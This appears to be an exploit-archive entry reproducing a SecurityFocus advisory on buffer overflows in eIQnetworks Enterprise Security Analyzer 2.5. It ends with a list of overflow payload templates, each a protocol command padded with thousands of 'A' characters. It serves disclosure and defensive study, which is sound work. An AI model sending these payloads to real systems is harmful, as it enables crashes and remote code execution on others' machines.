14 lines
No EOL
928 B
Text
14 lines
No EOL
928 B
Text
source: https://www.securityfocus.com/bid/23454/info
|
|
|
|
eIQnetworks Enterprise Security Analyzer is prone to multiple buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
|
|
|
|
Exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
|
|
|
|
Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also be affected.
|
|
|
|
- DELETESEARCHFOLDER : [DELETESEARCHFOLDER&A x 40000...&]
|
|
- DELTASK: [DELTASK&A x 3000...¤t&test&]
|
|
- HMGR_CHECKHOSTSCSV: [ HMGR_CHECKHOSTSCSV&A x 80000...&]
|
|
- TASKUPDATEDUSER: [TASKUPDATEDUSER&A x 60000...&test&test&]
|
|
- VERIFYUSERKEY: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]
|
|
- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&] |